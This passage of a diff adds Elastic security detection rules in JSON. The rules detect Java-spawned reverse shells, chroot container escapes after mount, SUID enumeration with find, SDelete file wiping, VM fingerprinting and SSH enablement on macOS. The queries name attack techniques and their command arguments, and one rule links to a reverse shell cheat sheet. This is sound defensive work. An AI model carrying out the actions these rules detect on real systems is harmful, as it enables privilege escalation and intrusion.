\"/usr/java/*\") and\n process.parent.args : \"-jar\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n and not process.parent.args in (\n \"/usr/share/java/jenkins.war\", \"/etc/remote-iot/services/remoteiot.jar\",\n \"/usr/lib64/NetExtender.jar\", \"/usr/lib/jenkins/jenkins.war\"\n )] by process.parent.entity_id\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5a3d5447-31c9-409a-aed1-72f9921594fd", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 8 + }, + "id": "5a3d5447-31c9-409a-aed1-72f9921594fd_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5ae02ebc-a5de-4eac-afe6-c88de696477d_2.json b/packages/security_detection_engine/kibana/security_rule/5ae02ebc-a5de-4eac-afe6-c88de696477d_2.json new file mode 100644 index 00000000000..42f67836391 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5ae02ebc-a5de-4eac-afe6-c88de696477d_2.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the execution of a file system mount followed by a chroot execution. Given enough permissions, a user within a container is capable of mounting the root file system of the host, and leveraging chroot to escape its containarized environment. This behavior pattern is very uncommon and should be investigated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Chroot Container Escape via Mount", + "query": "sequence by host.id, process.parent.entity_id with maxspan=5m\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"mount\" and process.args : \"/dev/sd*\" and process.args_count >= 3 and\n process.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"chroot\"]\n", + "references": [ + "https://book.hacktricks.xyz/v/portugues-ht/linux-hardening/privilege-escalation/escaping-from-limited-bash" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5ae02ebc-a5de-4eac-afe6-c88de696477d", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to \u201cManage \u2192 Policies\u201d, and edit one or more of your Elastic Defend integration policies.\n- Select the\u201d Policy settings\u201d tab, then scroll down to the \u201cLinux event collection\u201d section near the bottom.\n- Check the box for \u201cProcess events\u201d, and turn on the \u201cInclude session data\u201d toggle.\n- If you want to include file and network alerts in Session View, check the boxes for \u201cNetwork and File events\u201d.\n- If you want to enable terminal output capture, turn on the \u201cCapture terminal output\u201d toggle.\nFor more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Domain: Container", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "5ae02ebc-a5de-4eac-afe6-c88de696477d_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106.json new file mode 100644 index 00000000000..34f422110aa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects use of the systemsetup command to enable remote SSH Login.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Remote SSH Login Enabled via systemsetup Command", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:systemsetup and\n process.args:(\"-setremotelogin\" and on) and\n not process.parent.executable : /usr/local/jamf/bin/jamf\n", + "references": [ + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", + "https://ss64.com/osx/systemsetup.html", + "https://support.apple.com/guide/remote-desktop/about-systemsetup-apd95406b8d/mac" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_108.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_108.json new file mode 100644 index 00000000000..dd0278ea40f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_108.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Secure File Deletion via SDelete Utility", + "note": "## Triage and analysis\n\n### Investigating Potential Secure File Deletion via SDelete Utility\n\nSDelete is a tool primarily used for securely deleting data from storage devices, making it unrecoverable. Microsoft develops it as part of the Sysinternals Suite. Although commonly used to delete data securely, attackers can abuse it to delete forensic indicators and remove files as a post-action to a destructive action such as ransomware or data theft to hinder recovery efforts.\n\nThis rule identifies file name patterns generated by the use of SDelete utility to securely delete a file via multiple file overwrite and rename operations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line and identify the files deleted, their importance and whether they could be the target of antiforensics activity.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If important data was encrypted, deleted, or modified, activate your data recovery plan.\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"change\" and file.name : \"*AAA.AAA\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_109.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_109.json new file mode 100644 index 00000000000..f597ba942f3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_109.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects file name patterns generated by the use of Sysinternals SDelete utility to securely delete a file via multiple file overwrite and rename operations.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Secure File Deletion via SDelete Utility", + "note": "## Triage and analysis\n\n### Investigating Potential Secure File Deletion via SDelete Utility\n\nSDelete is a tool primarily used for securely deleting data from storage devices, making it unrecoverable. Microsoft develops it as part of the Sysinternals Suite. Although commonly used to delete data securely, attackers can abuse it to delete forensic indicators and remove files as a post-action to a destructive action such as ransomware or data theft to hinder recovery efforts.\n\nThis rule identifies file name patterns generated by the use of SDelete utility to securely delete a file via multiple file overwrite and rename operations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line and identify the files deleted, their importance and whether they could be the target of antiforensics activity.\n\n### False positive analysis\n\n- This is a dual-use tool, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the administrator is aware of the activity, no other suspicious activity was identified, and there are justifications for the execution.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If important data was encrypted, deleted, or modified, activate your data recovery plan.\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"change\" and file.name : \"*AAA.AAA\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Impact", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.004", + "name": "File Deletion", + "reference": "https://attack.mitre.org/techniques/T1070/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_108.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_108.json new file mode 100644 index 00000000000..673302a86b3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_108.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.", + "false_positives": [ + "Certain tools or automated software may enumerate hardware information. These tools can be exempted via user name or process arguments to eliminate potential noise." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Virtual Machine Fingerprinting", + "query": "event.category:process and host.os.type:linux and event.type:(start or process_started) and\n process.args:(\"/sys/class/dmi/id/bios_version\" or\n \"/sys/class/dmi/id/product_name\" or\n \"/sys/class/dmi/id/chassis_vendor\" or\n \"/proc/scsi/scsi\" or\n \"/proc/ide/hd0/model\") and\n not user.name:root\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5b03c9fb-9945-4d2f-9568-fd690fee3fba", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "5b03c9fb-9945-4d2f-9568-fd690fee3fba_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_5.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_5.json new file mode 100644 index 00000000000..53c321ff6bf --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_5.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the \"find\" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SUID/SGUID Enumeration Detected", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count >= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "5b06a27f-ad72-4499-91db-0c69667bffa5", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the 